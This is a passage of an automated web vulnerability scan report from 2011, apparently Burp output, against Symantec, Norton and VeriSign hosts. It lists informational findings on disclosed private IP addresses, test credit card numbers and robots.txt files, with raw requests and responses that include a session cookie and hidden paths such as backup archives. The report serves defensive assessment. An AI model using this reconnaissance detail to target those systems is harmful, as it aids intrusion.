There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

18.1. http://query.verisign.com/cluster.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://query.verisign.com
Path:	/cluster.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.18.68.100

Request

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:24:45 GMT
Content-Type: application/x-javascript
Last-Modified: Mon, 02 Nov 2009 13:15:17 GMT
Content-Length: 8783
Cache-Control: public, max-age=31622400
Expires: Sun, 09 Sep 2012 21:24:45 GMT
Vary: Accept-Encoding

// Copyright 2006 Google Inc., All Rights Reserved
// dspencer@google.com

/**
* @fileoverview
*
* This file is for the rendering of Clustered Search results
* on the GSA.
*
*
* The flow is:

...[SNIP]...
put=xml_no_dtd&sort=date%3AD%3AL%3Ad1&
* ie=UTF-8&btnG=Google+Search&client=f7&q=china&ud=1&
* site=default_collection&oe=UTF-8&proxystylesheet=f7&
* ip=172.18.68.100"
*
* @param {Function} render: The rendering function which is called on
* completion with 2 arguments, the search URL (the arg above) and the JSON
* blob that comes back from the CS.
*
...[SNIP]...

18.2. http://query.verisign.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://query.verisign.com
Path:	/search

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.244.28.108

Request

Response

18.3. https://query.verisign.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://query.verisign.com
Path:	/search

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.244.28.107

Request

GET /search HTTP/1.1
Host: query.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:20 GMT
Server: saws
Cache-Control: private
Content-Type: text/html
Content-Length: 44676
Connection: close

<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html><head>
<meta name="robots" content="NOINDEX,NOFOLLOW">
<meta http-equiv="X-UA-Compatible" content="IE=7">
<meta http-equiv="c
...[SNIP]...
<body onload="pruneHeaders();resetForms(); cs_loadClusters('site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend&ie=UTF-8&ip=10.244.28.107&access=p&sort=date%3AD%3AL%3Ad1&entqr=1&entsp=0&oe=UTF-8&ud=1', cs_drawClusters); " dir="ltr">
...[SNIP]...

19. Credit card numbers disclosed previous next
There are 2 instances of this issue:

https://renewals.symantec.com/renewals/js/commonValidation2-9-06.js
http://us.norton.com/content/en/us/home_homeoffice/media/pdf/norton_cybercrime_exposed_booklet.pdf

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

19.1. https://renewals.symantec.com/renewals/js/commonValidation2-9-06.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://renewals.symantec.com
Path:	/renewals/js/commonValidation2-9-06.js

Issue detail

The following credit card number was disclosed in the response:

4321123443211234

Request

GET /renewals/js/commonValidation2-9-06.js HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:36 GMT
Content-Length: 32366
Last-Modified: Thu, 18 Mar 2010 01:42:32 GMT
Accept-Ranges: bytes

// $Id: commonValidation2-9-06.js 82 2008-01-30 00:07:20Z mhallesy $
//please do not make changes to this file!
//if you need to modify it, please make a copy, since this script is used by multipl
...[SNIP]...
Reverse(n);
var total = AddedTogether(reversed);
if(total % 10 > 0) { return 0; }
return 1;
} // Mod10()

function CheckTestCard(n) {
isTest = false;
if (n == ("4567765445677654" || "4321123443211234")) { isTest = true;}
return isTest;
} // CheckTestCard

function ValidateCC(formContents) {
ccNumberChecked = StripNonDigits(formContents);
ccType = GetType(ccNumberChecked);
ccNumb
...[SNIP]...

19.2. http://us.norton.com/content/en/us/home_homeoffice/media/pdf/norton_cybercrime_exposed_booklet.pdf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://us.norton.com
Path:	/content/en/us/home_homeoffice/media/pdf/norton_cybercrime_exposed_booklet.pdf

Issue detail

The following credit card number was disclosed in the response:

4390000000000000

Request

GET /content/en/us/home_homeoffice/media/pdf/norton_cybercrime_exposed_booklet.pdf HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Length: 720962
Last-Modified: Thu, 08 Oct 2009 21:38:05 GMT
ETag: "b0042-4ace5bbd"
Accept-Ranges: bytes
Content-Type: application/pdf
Cache-Control: public, max-age=2171
Date: Fri, 09 Sep 2011 21:47:13 GMT
Connection: close

%PDF-1.4%....
115 0 obj<</Linearized 1/L 704881/O 117/E 187596/N 20/T 702538/H [ 916 745]>>endobj xref115 310000000016 00000 n
0000001661 00000 n
0000001763 00000 n
0000002280 0
...[SNIP]...
645 549 504 632 670 276 437 583 511 797 664 0 563 663 585 550 518 648 580 832 0 527 0 0 0 0 0 431 0 510 546 458 546 491 327 508 551 258 258 487 258 816 551 520 546 546 367 446 340 551 459 689 457 462 439 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 250 408 408 0 0 969 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 799 0 0 0 0 453]/BaseFont/IVAHPG+SymantecSansLight/FirstChar 32/ToUnicode 80 0 R/Encoding/WinAnsiEncoding/Type/Font>
...[SNIP]...

20. Robots.txt file previous next
There are 47 instances of this issue:

http://1168.ic-live.com/goat.php
http://admin.instantservice.com/resources/smartbutton/5851/42379/available.gif
https://admin.instantservice.com/links/5851/14753
http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_grad.png
http://buy-static.norton.com/estore/images/master/misc/gradient_background.gif
https://buy-static.norton.com/estore/images/en/Non-Product/Misc/LiveChat/
http://buy.norton.com/
http://cdn.verisign.com/assets/trust-seal/css/hp.css
https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
http://ch.norton.com/
http://com-verisign.netmng.com/
http://community.norton.com/norton/
http://de.community.norton.com/
https://drh.img.digitalriver.com/DRHM/Storefront/Site/symnasmb/pb/images/LivePerson/proactive2/Chat/Store/Challenger/
http://gs.instantservice.com/geoipAPI.js
http://investor.symantec.com/phoenix.zhtml
https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
https://knowledge.verisign.com/favicon.ico
http://l.addthiscdn.com/live/t00/200lo.gif
http://mbox3.offermatica.com/m2/verisign/ubox/image
http://om.symantec.com/b/ss/veritasnonconsumer,symantecabout/1/H.22.1/s62617202242836
http://partnerlocator.symantec.com/public/search
http://player.ooyala.com/player.js
http://productadvisor.symantec.com/app/en/US/adirect/symantec
https://products.geotrust.com/signup/codesign.do
https://products.verisign.com/geocenter/reseller/logon.do
http://query.verisign.ch/search
http://query.verisign.com/search
https://query.verisign.com/search
http://rs.instantservice.com/resources/smartbutton/5851/II3_Servers.js
http://searchg.symantec.com/search
https://ssl-certificate-center.verisign.ch/process/retail/console_login
https://ssl-certificate-center.verisign.com/process/retail/console_login
https://symantec-corporation.com/servlet/campaignrespondent
http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard
https://test-products.verisign.com/geocenter/reseller/logon.do
https://trust-center.verisign.ch/process/retail/trust_initial
https://trust-center.verisign.com/process/retail/trust_initial
http://twitter.com/statuses/user_timeline/pctools.json
http://us.norton.com/index.jsp
https://us.norton.com/index.jsp
https://www-secure.symantec.com/feedback/webmaster.jsp
http://www.google-analytics.com/__utm.gif
http://www.symantec.com/scripts/swfobject.js
http://www.verisign.ch/
http://www.verisign.com/
https://www.verisign.com/products/site/

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

20.1. http://1168.ic-live.com/goat.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://1168.ic-live.com
Path:	/goat.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 1168.ic-live.com

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:26:17 GMT
Server: Apache
Last-Modified: Mon, 08 Aug 2011 21:54:33 GMT
ETag: "37843a-72f-4aa057e0a3840"
Accept-Ranges: bytes
Content-Length: 1839
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="/w3c/p3p.xml"
Content-Type: text/plain
X-Cache: MISS from i2a-coll-7
X-Cache-Lookup: MISS from i2a-coll-7:80
Via: 1.0 i2a-coll-7:80 (squid/2.6.STABLE21)
Connection: close

...User-agent: *
Disallow: /allCountryCodes.txt
Disallow: /altidconv.php
Disallow: /backup/
Disallow: /bugs-dec16.tar
Disallow: /cgi-bin/
Disallow: /checktime.php
Disallow: /client-kit/
Disallow: /com
...[SNIP]...

20.2. http://admin.instantservice.com/resources/smartbutton/5851/42379/available.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://admin.instantservice.com
Path:	/resources/smartbutton/5851/42379/available.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: admin.instantservice.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
Last-Modified: Thu, 14 Jul 2011 18:16:35 GMT
ETag: "1a-887f66c0"
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/plain; charset=iso-8859-1

User-agent: *
Disallow: /

20.3. https://admin.instantservice.com/links/5851/14753 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.instantservice.com
Path:	/links/5851/14753

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: admin.instantservice.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:50 GMT
Server: Apache
Last-Modified: Thu, 14 Jul 2011 18:16:35 GMT
ETag: "1a-887f66c0"
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/plain; charset=iso-8859-1

User-agent: *
Disallow: /

20.4. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_grad.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.verisign.com
Path:	/authweb/global/assets/shared/images/nav/nav_grad.png

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: blogs.verisign.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:11 GMT
Server: Apache
Last-Modified: Wed, 05 Mar 2008 18:53:14 GMT
ETag: "1a6035a-21-221fba80"
Accept-Ranges: bytes
Content-Length: 33
Content-Type: text/plain; charset=UTF-8
Connection: close

User-agent: *
Disallow: /stooge/

20.5. http://buy-static.norton.com/estore/images/master/misc/gradient_background.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://buy-static.norton.com
Path:	/estore/images/master/misc/gradient_background.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: buy-static.norton.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a
Last-Modified: Mon, 23 Aug 2010 19:28:11 GMT
ETag: "1f84c4-1c-48e82a62248c0"
Accept-Ranges: bytes
Content-Length: 28
Content-Type: text/plain
Date: Fri, 09 Sep 2011 21:31:19 GMT
Connection: close

User-agent: *
Disallow: /

20.6. https://buy-static.norton.com/estore/images/en/Non-Product/Misc/LiveChat/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://buy-static.norton.com
Path:	/estore/images/en/Non-Product/Misc/LiveChat/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: buy-static.norton.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a
Last-Modified: Fri, 20 Aug 2010 19:33:33 GMT
ETag: "5e44c4-1c-48e465fcd7d40"
Accept-Ranges: bytes
Content-Length: 28
Content-Type: text/plain
Date: Fri, 09 Sep 2011 21:37:23 GMT
Connection: close

User-agent: *
Disallow: /

20.7. http://buy.norton.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://buy.norton.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: buy.norton.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Sep 2011 21:31:16 GMT
Content-Length: 34
Content-Type: text/html
X-Powered-By: Servlet/2.5 JSP/2.1

User-agent: *
<br>Disallow: /
<br>

20.8. http://cdn.verisign.com/assets/trust-seal/css/hp.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.verisign.com
Path:	/assets/trust-seal/css/hp.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.verisign.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "29ac2fd-9eb-49a38fa8970c0"
Accept-Ranges: bytes
Content-Type: text/plain
Age: 3946
Date: Fri, 09 Sep 2011 21:26:14 GMT
Last-Modified: Wed, 19 Jan 2011 20:36:59 GMT
Expires: Sun, 09 Oct 2011 20:20:28 GMT
Content-Length: 2539
Connection: close

User-Agent: *
Disallow: /aol/
Disallow: /att/
Disallow: /authentic/
Disallow: /aventail/
Disallow: /b2b/
Disallow: /cd/
Disallow: /cdrom/
Disallow: /cgi-bin/
Disallow: /checkpoint/
Disallow: /client/

...[SNIP]...

20.9. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/shared/js/jquery.cacheimage.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.verisign.com

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:28 GMT
Content-Type: text/plain
Connection: close
ETag: "28e934c-9eb-49a38fa8970c0"
Accept-Ranges: bytes
Last-Modified: Wed, 19 Jan 2011 20:36:59 GMT
Expires: Sun, 09 Oct 2011 21:38:28 GMT
Content-Length: 2539

User-Agent: *
Disallow: /aol/
Disallow: /att/
Disallow: /authentic/
Disallow: /aventail/
Disallow: /b2b/
Disallow: /cd/
Disallow: /cdrom/
Disallow: /cgi-bin/
Disallow: /checkpoint/
Disallow: /client/

...[SNIP]...

20.10. http://ch.norton.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ch.norton.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ch.norton.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Length: 534
Last-Modified: Thu, 29 Jul 2010 20:29:17 GMT
ETag: "216-4c51e49d"
Accept-Ranges: bytes
Content-Type: text/plain;charset=UTF-8
Cache-Control: public, max-age=14107
Date: Fri, 09 Sep 2011 21:41:25 GMT
Connection: close

User-agent:*
Disallow:/common/
Disallow:/content/
Disallow:/corp/
Disallow:/css/
Disallow:/ssi/
Disallow:/lib/
Disallow:/errors/
Disallow:/feedback/
Disallow:/media/
Disallow:/script/
Disal
...[SNIP]...

20.11. http://com-verisign.netmng.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://com-verisign.netmng.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: com-verisign.netmng.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:24:40 GMT
Server: Apache/2.2.9
Last-Modified: Tue, 06 Apr 2010 14:04:58 GMT
ETag: "1c44a1-1a-48391ee477680"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

20.12. http://community.norton.com/norton/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.norton.com
Path:	/norton/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: community.norton.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:41:45 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Last-Modified: Fri, 09 Sep 2011 07:04:51 GMT
ETag: "82786-17b-4ac7ccb32122c"
Accept-Ranges: bytes
Content-Length: 379
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# Default Generated robots.txt file
User-agent: *
Crawl-delay: 5
Disallow: /t5/forums/forumtopicprintpage
Disallow: /t5/ideas/ideaprintpage
Disallow: /t5/blogs/blogarticleprintpage
Disallow: /t5/help
...[SNIP]...

20.13. http://de.community.norton.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://de.community.norton.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: de.community.norton.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:41:49 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Fri, 09 Sep 2011 02:17:05 GMT
ETag: "35c1329-199-4ac78c6034a40"
Accept-Ranges: bytes
Content-Length: 409
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# Default Generated robots.txt file
User-agent: *
Crawl-delay: 5
Disallow: /t5/forums/forumtopicprintpage
Disallow: /t5/ideas/ideaprintpage
Disallow: /t5/blogs/blogarticleprintpage
Disallow: /t5/help
...[SNIP]...

20.14. https://drh.img.digitalriver.com/DRHM/Storefront/Site/symnasmb/pb/images/LivePerson/proactive2/Chat/Store/Challenger/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://drh.img.digitalriver.com
Path:	/DRHM/Storefront/Site/symnasmb/pb/images/LivePerson/proactive2/Chat/Store/Challenger/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: drh.img.digitalriver.com

Response

HTTP/1.0 200 OK
ETag: "49-3ebbc10b"
Content-Type: text/plain
Last-Modified: Fri, 09 May 2003 14:54:03 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (M;max-age=0+0;age=0;ecid=94643838326,0)
Content-Length: 73
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb04@dc1app59
Accept-Ranges: bytes
Date: Fri, 09 Sep 2011 21:41:50 GMT
Connection: close

User-agent: Ultraseek
Disallow: /
User-agent: Inktomi Search
Disallow: /

20.15. http://gs.instantservice.com/geoipAPI.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gs.instantservice.com
Path:	/geoipAPI.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: gs.instantservice.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:28:14 GMT
Server: Apache
Last-Modified: Thu, 14 Jul 2011 18:15:35 GMT
ETag: "21f297-1a-84ebdfc0"
Accept-Ranges: bytes
Content-Length: 26
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /

20.16. http://investor.symantec.com/phoenix.zhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://investor.symantec.com
Path:	/phoenix.zhtml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: investor.symantec.com

Response

HTTP/1.0 200 OK
Content-Length: 499
Content-Type: text/plain
Last-Modified: Fri, 09 Sep 2011 12:00:00 GMT
Accept-Ranges: bytes
ETag: "03eb00e86ecc1:3239"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: Fri, 09 Sep 2011 21:42:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 09 Sep 2011 21:42:04 GMT
Connection: close

# ========v2.7 - 1/20/11=========================#
# =====Block all bots except below entries between 8am and 8pm EST=====#

User-agent: fusionbot
Disallow: /preview
Disallow: /redesign
Disallow
...[SNIP]...

20.17. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/ssl-certificates-support/index.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: knowledge.verisign.ch

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:42:30 GMT
Server: Apache
Last-Modified: Wed, 01 Jun 2011 21:13:13 GMT
ETag: "b690c1-3c-4a4acfd02ec40"
Accept-Ranges: bytes
Content-Length: 60
Connection: close
Content-Type: text/plain

User-agent: gsa-crawler
Allow: /

User-agent: *
Disallow: /

20.18. https://knowledge.verisign.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: knowledge.verisign.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:13 GMT
Server: Apache
Last-Modified: Wed, 01 Jun 2011 21:12:44 GMT
ETag: "34ceb-3c-4a4acfb486b00"
Accept-Ranges: bytes
Content-Length: 60
Connection: close
Content-Type: text/plain

User-agent: gsa-crawler
Allow: /

User-agent: *
Disallow: /

20.19. http://l.addthiscdn.com/live/t00/200lo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://l.addthiscdn.com
Path:	/live/t00/200lo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.addthiscdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Jun 2011 11:39:23 GMT
ETag: "df8ab7-1b-4a51dabdf10c0"
Content-Type: text/plain; charset=UTF-8
Date: Fri, 09 Sep 2011 21:26:10 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *

20.20. http://mbox3.offermatica.com/m2/verisign/ubox/image previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mbox3.offermatica.com
Path:	/m2/verisign/ubox/image

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: mbox3.offermatica.com

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: text/plain
Date: Fri, 09 Sep 2011 21:24:34 GMT
Accept-Ranges: bytes
ETag: W/"25-1309299047000"
Connection: close
Last-Modified: Tue, 28 Jun 2011 22:10:47 GMT
Content-Length: 25

User-agent: *
Disallow: /

20.21. http://om.symantec.com/b/ss/veritasnonconsumer,symantecabout/1/H.22.1/s62617202242836 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://om.symantec.com
Path:	/b/ss/veritasnonconsumer,symantecabout/1/H.22.1/s62617202242836

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: om.symantec.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:11 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "1a8177-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www606
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

20.22. http://partnerlocator.symantec.com/public/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://partnerlocator.symantec.com
Path:	/public/search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: partnerlocator.symantec.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Fri, 09 Sep 2011 21:37:42 GMT
Content-Type: text/plain
Content-Length: 26
Last-Modified: Fri, 05 Feb 2010 14:46:53 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /

20.23. http://player.ooyala.com/player.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://player.ooyala.com
Path:	/player.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: player.ooyala.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sun, 07 Aug 2011 04:04:05 GMT
X-Ooyala-Server-Id: i-cfd6a4a3
Content-Type: text/plain
Date: Fri, 09 Sep 2011 21:26:10 GMT
Content-Length: 184
Connection: close

# This robots.txt is only for api.ooyala.com and backlot.ooyala.com. It should not be used for www.ooyala.com.
User-agent: *
Disallow: /
Allow: /backlot/web
Allow: /syndication/google

20.24. http://productadvisor.symantec.com/app/en/US/adirect/symantec previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://productadvisor.symantec.com
Path:	/app/en/US/adirect/symantec

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: productadvisor.symantec.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:12 GMT
Server: Apache/2.2.8 (Unix)
Last-Modified: Thu, 19 Nov 2009 20:25:26 GMT
ETag: "518003-273-478bf28d55980"
Accept-Ranges: bytes
Content-Length: 627
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /*cmd=catCompare
Disallow: /*cmd=symExtCatProductCompare
Disallow: /*cmd=catProductDetail
Disallow: /*cmd=symExtCatProductDetail
Disallow: /*cmd=ProductPricer
Disallow:
...[SNIP]...

20.25. https://products.geotrust.com/signup/codesign.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://products.geotrust.com
Path:	/signup/codesign.do

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: products.geotrust.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Sep 2011 21:46:16 GMT
Content-Length: 26
Content-Type: text/plain

User-agent: *
Disallow: /

20.26. https://products.verisign.com/geocenter/reseller/logon.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://products.verisign.com
Path:	/geocenter/reseller/logon.do

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: products.verisign.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Sep 2011 21:28:04 GMT
Content-Length: 26
Content-Type: text/plain
X-Powered-By: Servlet/2.5 JSP/2.1

User-agent: *
Disallow: /

20.27. http://query.verisign.ch/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://query.verisign.ch
Path:	/search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: query.verisign.ch

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:20 GMT
Content-Type: text/plain
Last-Modified: Mon, 02 Nov 2009 13:15:17 GMT
Content-Length: 26
Cache-Control: public, max-age=2592000
Expires: Sun, 09 Oct 2011 21:46:20 GMT
Connection: close

User-agent: *
Disallow: /

20.28. http://query.verisign.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://query.verisign.com
Path:	/search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: query.verisign.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:09 GMT
Content-Type: text/plain
Last-Modified: Mon, 02 Nov 2009 13:15:17 GMT
Content-Length: 26
Cache-Control: public, max-age=2592000
Expires: Sun, 09 Oct 2011 21:26:09 GMT
Connection: close

User-agent: *
Disallow: /

20.29. https://query.verisign.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://query.verisign.com
